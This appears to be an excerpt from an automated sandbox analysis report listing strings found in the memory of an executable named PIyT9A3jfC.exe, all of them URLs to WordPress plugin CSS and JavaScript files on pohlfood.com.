                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?ver
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=5.15.
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/v4-shims.min.css?ver=3.
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/font-awesome/js/v4-shims.min.js?ver=3.14
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=3.14.1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/swiper/css/swiper.min.css?ver=5.3.6
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=5.3.6
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.2
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/ooohboi-steroids-for-elementor/assets/css/main.css?ver=2.1.50
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/ooohboi-steroids-for-elementor/assets/js/ooohboi-steroids.js?
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/pojo-accessibility/assets/css/style.min.css?ver=1.0.0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/pojo-accessibility/assets/js/app.min.js?ver=1.0.0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/css/flipbook.style.css?ver=3.25
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/css/font-awesome.css?ver=3.25
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/embed.js?ver=3.25
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.book3.min.js?ver=3.25
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.min.js?ver=3.25
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.pdfservice.min.js?ver=3.25
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.swipe.min.js?ver=3.25
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.webgl.min.js?ver=3.25
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/iscroll.min.js?ver=3.25
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/pdf.min.js?ver=3.25
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/three.min.js?ver=3.25
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/tfc-product-catalog/tfc-product-catalog.js?ver=1.0.0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/antiscroll/css.css?ver=2.1.0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/antiscroll/js.js?ver=2.1.0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/css.min.css?ver=2.1.0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/freeze_table/css.css?ver=2.1.0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/freeze_table/js.js?ver=2.1.0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/js.min.js?ver=2.1.0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/multirange/css.css?ver=2.1.0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/multirange/js.js?ver=2.1.0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=7.9.0
